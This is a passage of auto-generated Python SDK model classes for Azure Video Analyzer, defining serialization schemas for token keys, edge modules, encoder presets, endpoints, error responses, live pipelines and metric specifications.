'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'} } def __init__( self, **kwargs ): super(TokenKey, self).__init__(**kwargs) self.type = None # type: Optional[str] self.kid = kwargs['kid'] class EccTokenKey(TokenKey): """Required validation properties for tokens generated with Elliptical Curve algorithm. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param kid: Required. JWT token key id. Validation keys are looked up based on the key id present on the JWT token header. :type kid: str :param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible values include: "ES256", "ES384", "ES512". :type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo :param x: Required. X coordinate. :type x: str :param y: Required. Y coordinate. :type y: str """ _validation = { 'type': {'required': True}, 'kid': {'required': True}, 'alg': {'required': True}, 'x': {'required': True}, 'y': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'kid': {'key': 'kid', 'type': 'str'}, 'alg': {'key': 'alg', 'type': 'str'}, 'x': {'key': 'x', 'type': 'str'}, 'y': {'key': 'y', 'type': 'str'}, } def __init__( self, **kwargs ): super(EccTokenKey, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str self.alg = kwargs['alg'] self.x = kwargs['x'] self.y = kwargs['y'] class EdgeModuleEntity(ProxyResource): """The representation of an edge module. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module. :vartype edge_module_id: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'edge_module_id': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleEntity, self).__init__(**kwargs) self.edge_module_id = None class EdgeModuleEntityCollection(msrest.serialization.Model): """A collection of EdgeModuleEntity items. :param value: A collection of EdgeModuleEntity items. :type value: list[~video_analyzer.models.EdgeModuleEntity] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[EdgeModuleEntity]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleEntityCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class EdgeModuleProvisioningToken(msrest.serialization.Model): """Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset. Variables are only populated by the server, and will be ignored when sending a request. :ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to the token expiration date. :vartype expiration_date: ~datetime.datetime :ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through the Azure IoT Edge module twin properties. :vartype token: str """ _validation = { 'expiration_date': {'readonly': True}, 'token': {'readonly': True}, } _attribute_map = { 'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'}, 'token': {'key': 'token', 'type': 'str'}, } def __init__( self, **kwargs ): super(EdgeModuleProvisioningToken, self).__init__(**kwargs) self.expiration_date = None self.token = None class EncoderPresetBase(msrest.serialization.Model): """Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EncoderCustomPreset, EncoderSystemPreset. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'} } def __init__( self, **kwargs ): super(EncoderPresetBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class EncoderCustomPreset(EncoderPresetBase): """Describes a custom preset for encoding the input content using the encoder processor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param audio_encoder: Describes a custom preset for encoding audio. :type audio_encoder: ~video_analyzer.models.AudioEncoderBase :param video_encoder: Describes a custom preset for encoding video. :type video_encoder: ~video_analyzer.models.VideoEncoderBase """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'}, 'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'}, } def __init__( self, **kwargs ): super(EncoderCustomPreset, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str self.audio_encoder = kwargs.get('audio_encoder', None) self.video_encoder = kwargs.get('video_encoder', None) class NodeBase(msrest.serialization.Model): """Base class for nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str """ _validation = { 'type': {'required': True}, 'name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'} } def __init__( self, **kwargs ): super(NodeBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.name = kwargs['name'] class ProcessorNodeBase(NodeBase): """Base class for topology processor nodes. You probably want to use the sub-classes and not this class directly. Known sub-classes are: EncoderProcessor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'} } def __init__( self, **kwargs ): super(ProcessorNodeBase, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str self.inputs = kwargs['inputs'] class EncoderProcessor(ProcessorNodeBase): """Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Node name. Must be unique within the topology. :type name: str :param inputs: Required. An array of upstream node references within the topology to be used as inputs for this node. :type inputs: list[~video_analyzer.models.NodeInput] :param preset: Required. The encoder preset, which defines the recipe or instructions on how the input content should be processed. :type preset: ~video_analyzer.models.EncoderPresetBase """ _validation = { 'type': {'required': True}, 'name': {'required': True}, 'inputs': {'required': True}, 'preset': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'inputs': {'key': 'inputs', 'type': '[NodeInput]'}, 'preset': {'key': 'preset', 'type': 'EncoderPresetBase'}, } def __init__( self, **kwargs ): super(EncoderProcessor, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str self.preset = kwargs['preset'] class EncoderSystemPreset(EncoderPresetBase): """Describes a built-in preset for encoding the input content using the encoder processor. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param name: Required. Name of the built-in encoding preset. Possible values include: "SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC", "SingleLayer_2160p_H264_AAC". :type name: str or ~video_analyzer.models.EncoderSystemPresetType """ _validation = { 'type': {'required': True}, 'name': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, } def __init__( self, **kwargs ): super(EncoderSystemPreset, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str self.name = kwargs['name'] class Endpoint(msrest.serialization.Model): """The endpoint details. All required parameters must be populated in order to send to Azure. :param endpoint_url: The URL of the endpoint. :type endpoint_url: str :param type: Required. The type of the endpoint. Possible values include: "ClientApi". :type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType """ _validation = { 'type': {'required': True}, } _attribute_map = { 'endpoint_url': {'key': 'endpointUrl', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, **kwargs ): super(Endpoint, self).__init__(**kwargs) self.endpoint_url = kwargs.get('endpoint_url', None) self.type = kwargs['type'] class EndpointBase(msrest.serialization.Model): """Base class for endpoints. You probably want to use the sub-classes and not this class directly. Known sub-classes are: TlsEndpoint, UnsecuredEndpoint. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param credentials: Required. Credentials to be presented to the endpoint. :type credentials: ~video_analyzer.models.CredentialsBase :param url: Required. The endpoint URL for Video Analyzer to connect to. :type url: str :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint URL. This is an optional property, typically used when the endpoint is behind a firewall. :type tunnel: ~video_analyzer.models.TunnelBase """ _validation = { 'type': {'required': True}, 'credentials': {'required': True}, 'url': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'credentials': {'key': 'credentials', 'type': 'CredentialsBase'}, 'url': {'key': 'url', 'type': 'str'}, 'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'} } def __init__( self, **kwargs ): super(EndpointBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.credentials = kwargs['credentials'] self.url = kwargs['url'] self.tunnel = kwargs.get('tunnel', None) class ErrorAdditionalInfo(msrest.serialization.Model): """The resource management error additional info. Variables are only populated by the server, and will be ignored when sending a request. :ivar type: The additional info type. :vartype type: str :ivar info: The additional info. :vartype info: any """ _validation = { 'type': {'readonly': True}, 'info': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'info': {'key': 'info', 'type': 'object'}, } def __init__( self, **kwargs ): super(ErrorAdditionalInfo, self).__init__(**kwargs) self.type = None self.info = None class ErrorDetail(msrest.serialization.Model): """The error detail. Variables are only populated by the server, and will be ignored when sending a request. :ivar code: The error code. :vartype code: str :ivar message: The error message. :vartype message: str :ivar target: The error target. :vartype target: str :ivar details: The error details. :vartype details: list[~video_analyzer.models.ErrorDetail] :ivar additional_info: The error additional info. :vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo] """ _validation = { 'code': {'readonly': True}, 'message': {'readonly': True}, 'target': {'readonly': True}, 'details': {'readonly': True}, 'additional_info': {'readonly': True}, } _attribute_map = { 'code': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'target': {'key': 'target', 'type': 'str'}, 'details': {'key': 'details', 'type': '[ErrorDetail]'}, 'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'}, } def __init__( self, **kwargs ): super(ErrorDetail, self).__init__(**kwargs) self.code = None self.message = None self.target = None self.details = None self.additional_info = None class ErrorResponse(msrest.serialization.Model): """Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.). :param error: The error object. :type error: ~video_analyzer.models.ErrorDetail """ _attribute_map = { 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(ErrorResponse, self).__init__(**kwargs) self.error = kwargs.get('error', None) class GroupLevelAccessControl(msrest.serialization.Model): """Group level network access control. :param public_network_access: Whether or not public network access is allowed for specified resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess """ _attribute_map = { 'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'}, } def __init__( self, **kwargs ): super(GroupLevelAccessControl, self).__init__(**kwargs) self.public_network_access = kwargs.get('public_network_access', None) class IotHub(msrest.serialization.Model): """The IoT Hub details. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param id: Required. The IoT Hub resource identifier. :type id: str :param identity: Required. The IoT Hub identity. :type identity: ~video_analyzer.models.ResourceIdentity :ivar status: The current status of the Iot Hub mapping. :vartype status: str """ _validation = { 'id': {'required': True}, 'identity': {'required': True}, 'status': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'ResourceIdentity'}, 'status': {'key': 'status', 'type': 'str'}, } def __init__( self, **kwargs ): super(IotHub, self).__init__(**kwargs) self.id = kwargs['id'] self.identity = kwargs['identity'] self.status = None class JwtAuthentication(AuthenticationBase): """Properties for access validation based on JSON Web Tokens (JWT). All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param issuers: List of expected token issuers. Token issuer is valid if it matches at least one of the given values. :type issuers: list[str] :param audiences: List of expected token audiences. Token audience is valid if it matches at least one of the given values. :type audiences: list[str] :param claims: List of additional token claims to be validated. Token must contains all claims and respective values for it to be valid. :type claims: list[~video_analyzer.models.TokenClaim] :param keys: List of keys which can be used to validate access tokens. Having multiple keys allow for seamless key rotation of the token signing key. Token signature must match exactly one key. :type keys: list[~video_analyzer.models.TokenKey] """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'issuers': {'key': 'issuers', 'type': '[str]'}, 'audiences': {'key': 'audiences', 'type': '[str]'}, 'claims': {'key': 'claims', 'type': '[TokenClaim]'}, 'keys': {'key': 'keys', 'type': '[TokenKey]'}, } def __init__( self, **kwargs ): super(JwtAuthentication, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str self.issuers = kwargs.get('issuers', None) self.audiences = kwargs.get('audiences', None) self.claims = kwargs.get('claims', None) self.keys = kwargs.get('keys', None) class KeyVaultProperties(msrest.serialization.Model): """The details for accessing the encryption keys in Key Vault. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key without a version (for example https://vault/keys/mykey). :type key_identifier: str :ivar current_key_identifier: The current key used to encrypt Video Analyzer account, including the key version. :vartype current_key_identifier: str """ _validation = { 'key_identifier': {'required': True}, 'current_key_identifier': {'readonly': True}, } _attribute_map = { 'key_identifier': {'key': 'keyIdentifier', 'type': 'str'}, 'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'}, } def __init__( self, **kwargs ): super(KeyVaultProperties, self).__init__(**kwargs) self.key_identifier = kwargs['key_identifier'] self.current_key_identifier = None class ListProvisioningTokenInput(msrest.serialization.Model): """The input parameters to generate registration token for the Azure Video Analyzer IoT edge module. All required parameters must be populated in order to send to Azure. :param expiration_date: Required. The desired expiration date of the registration token. The Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to the token expiration date. :type expiration_date: ~datetime.datetime """ _validation = { 'expiration_date': {'required': True}, } _attribute_map = { 'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'}, } def __init__( self, **kwargs ): super(ListProvisioningTokenInput, self).__init__(**kwargs) self.expiration_date = kwargs['expiration_date'] class LivePipeline(ProxyResource): """Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: The reference to an existing pipeline topology defined for real-time content processing. When activated, this live pipeline will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds this capacity, then the service will disconnect temporarily from the camera. It will retry to re-establish connection (with exponential backoff), checking to see if the camera bitrate is now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect other live pipelines in your account. :type bitrate_kbps: int :ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive", "Activating", "Active", "Deactivating". :vartype state: str or ~video_analyzer.models.LivePipelineState :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameters values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can be optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(LivePipeline, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.bitrate_kbps = kwargs.get('bitrate_kbps', None) self.state = None self.parameters = kwargs.get('parameters', None) class LivePipelineCollection(msrest.serialization.Model): """A collection of LivePipeline items. :param value: A collection of LivePipeline items. :type value: list[~video_analyzer.models.LivePipeline] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[LivePipeline]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(LivePipelineCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class LivePipelineOperationStatus(msrest.serialization.Model): """Used for tracking the status of an operation on the live pipeline. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The name of the live pipeline operation. :vartype name: str :ivar status: The status of the live pipeline operation. :vartype status: str :ivar error: The error details for the live pipeline operation. :vartype error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'readonly': True}, 'status': {'readonly': True}, 'error': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(LivePipelineOperationStatus, self).__init__(**kwargs) self.name = None self.status = None self.error = None class LivePipelineUpdate(ProxyResource): """Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param topology_name: The reference to an existing pipeline topology defined for real-time content processing. When activated, this live pipeline will process content according to the pipeline topology definition. :type topology_name: str :param description: An optional description for the pipeline. :type description: str :param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds this capacity, then the service will disconnect temporarily from the camera. It will retry to re-establish connection (with exponential backoff), checking to see if the camera bitrate is now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect other live pipelines in your account. :type bitrate_kbps: int :ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive", "Activating", "Active", "Deactivating". :vartype state: str or ~video_analyzer.models.LivePipelineState :param parameters: List of the instance level parameter values for the user-defined topology parameters. A pipeline can only define or override parameters values for parameters which have been declared in the referenced topology. Topology parameters without a default value must be defined. Topology parameters with a default value can be optionally be overridden. :type parameters: list[~video_analyzer.models.ParameterDefinition] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'state': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'topology_name': {'key': 'properties.topologyName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'}, 'state': {'key': 'properties.state', 'type': 'str'}, 'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'}, } def __init__( self, **kwargs ): super(LivePipelineUpdate, self).__init__(**kwargs) self.topology_name = kwargs.get('topology_name', None) self.description = kwargs.get('description', None) self.bitrate_kbps = kwargs.get('bitrate_kbps', None) self.state = None self.parameters = kwargs.get('parameters', None) class LogSpecification(msrest.serialization.Model): """A diagnostic log emitted by service. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The diagnostic log category name. :vartype name: str :ivar display_name: The diagnostic log category display name. :vartype display_name: str :ivar blob_duration: The time range for requests in each blob. :vartype blob_duration: str """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'blob_duration': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'blob_duration': {'key': 'blobDuration', 'type': 'str'}, } def __init__( self, **kwargs ): super(LogSpecification, self).__init__(**kwargs) self.name = None self.display_name = None self.blob_duration = None class MetricDimension(msrest.serialization.Model): """A metric dimension. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The metric dimension name. :vartype name: str :ivar display_name: The display name for the dimension. :vartype display_name: str :ivar to_be_exported_for_shoebox: Whether to export metric to shoebox. :vartype to_be_exported_for_shoebox: bool """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'to_be_exported_for_shoebox': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'}, } def __init__( self, **kwargs ): super(MetricDimension, self).__init__(**kwargs) self.name = None self.display_name = None self.to_be_exported_for_shoebox = None class MetricSpecification(msrest.serialization.Model): """A metric emitted by service. Variables are only populated by the server, and will be ignored when sending a request. :ivar name: The metric name. :vartype name: str :ivar display_name: The metric display name. :vartype display_name: str :ivar display_description: The metric display description. :vartype display_description: str :ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds". :vartype unit: str or ~video_analyzer.models.MetricUnit :ivar aggregation_type: The metric aggregation type. Possible values include: "Average", "Count", "Total". :vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType :ivar lock_aggregation_type: The metric lock aggregation type. Possible values include: "Average", "Count", "Total". :vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType :param supported_aggregation_types: Supported aggregation types. :type supported_aggregation_types: list[str] :ivar dimensions: The metric dimensions. :vartype dimensions: list[~video_analyzer.models.MetricDimension] :ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled. :vartype enable_regional_mdm_account: bool :ivar source_mdm_account: The source MDM account. :vartype source_mdm_account: str :ivar source_mdm_namespace: The source MDM namespace. :vartype source_mdm_namespace: str :ivar supported_time_grain_types: The supported time grain types. :vartype supported_time_grain_types: list[str] """ _validation = { 'name': {'readonly': True}, 'display_name': {'readonly': True}, 'display_description': {'readonly': True}, 'unit': {'readonly': True}, 'aggregation_type': {'readonly': True}, 'lock_aggregation_type': {'readonly': True}, 'dimensions': {'readonly': True}, 'enable_regional_mdm_account': {'readonly': True}, 'source_mdm_account': {'readonly': True}, 'source_mdm_namespace': {'readonly': True}, 'supported_time_grain_types': {'readonly': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'display_description': {'key': 'displayDescription', 'type': 'str'}, 'unit': {'key': 'unit', 'type': 'str'}, 'aggregation_type': {'key': 'aggregationType', 'type': 'str'}, 'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'}, 'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'}, 'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'}, 'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'}, 'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'}, 'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'}, 'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'}, } def __init__( self, **kwargs ): super(MetricSpecification, self).__init__(**kwargs) self.name = None self.display_name = None self.display_description = None self.unit = None self.aggregation_type = None self.lock_aggregation_type = None self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None) self.dimensions = None self.enable_regional_mdm_account = None self.source_mdm_account = None self.source_mdm_namespace = None self.supported_time_grain_types = None class NetworkAccessControl(msrest.serialization.Model): """Network access control for video analyzer account. :param integration: Public network access for integration group. :type integration: ~video_analyzer.models.GroupLevelAccessControl :param ingestion: Public network access for ingestion group. :type ingestion: ~video_analyzer.models.GroupLevelAccessControl :param consumption: Public network access for consumption group. :type consumption: ~video_analyzer.models.GroupLevelAccessControl """ _attribute_map = { 'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'}, 'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'}, 'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'}, } def __init__( self, **kwargs ): super(NetworkAccessControl, self).__init__(**kwargs) self.integration = kwargs.get('integration', None) self.ingestion = kwargs.get('ingestion', None) self.consumption = kwargs.get('consumption', None) class NodeInput(msrest.serialization.Model): """Describes an input signal to be used on a pipeline node. All required parameters must be populated in order to send to Azure. :param node_name: Required. The name of the upstream node in the pipeline which output is used as input of the current node. :type node_name: str """ _validation = { 'node_name': {'required': True}, } _attribute_map = { 'node_name': {'key': 'nodeName', 'type': 'str'}, } def __init__( self, **kwargs ): super(NodeInput, self).__init__(**kwargs) self.node_name = kwargs['node_name'] class Operation(msrest.serialization.Model): """An operation. All required parameters must be populated in order to send to Azure. :param name: Required. The operation name. :type name: str :param display: The operation display name. :type display: ~video_analyzer.models.OperationDisplay :param origin: Origin of the operation. :type origin: str :param properties: Operation properties format. :type properties: ~video_analyzer.models.Properties :param is_data_action: Whether the operation applies to data-plane. :type is_data_action: bool :param action_type: Indicates the action type. Possible values include: "Internal". :type action_type: str or ~video_analyzer.models.ActionType """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display': {'key': 'display', 'type': 'OperationDisplay'}, 'origin': {'key': 'origin', 'type': 'str'}, 'properties': {'key': 'properties', 'type': 'Properties'}, 'is_data_action': {'key': 'isDataAction', 'type': 'bool'}, 'action_type': {'key': 'actionType', 'type': 'str'}, } def __init__( self, **kwargs ): super(Operation, self).__init__(**kwargs) self.name = kwargs['name'] self.display = kwargs.get('display', None) self.origin = kwargs.get('origin', None) self.properties = kwargs.get('properties', None) self.is_data_action = kwargs.get('is_data_action', None) self.action_type = kwargs.get('action_type', None) class OperationCollection(msrest.serialization.Model): """A collection of Operation items. :param value: A collection of Operation items. :type value: list[~video_analyzer.models.Operation] """ _attribute_map = { 'value': {'key': 'value', 'type': '[Operation]'}, } def __init__( self, **kwargs ): super(OperationCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) class OperationDisplay(msrest.serialization.Model): """Operation details. :param provider: The service provider. :type provider: str :param resource: Resource on which the operation is performed. :type resource: str :param operation: The operation type. :type operation: str :param description: The operation description. :type description: str """ _attribute_map = { 'provider': 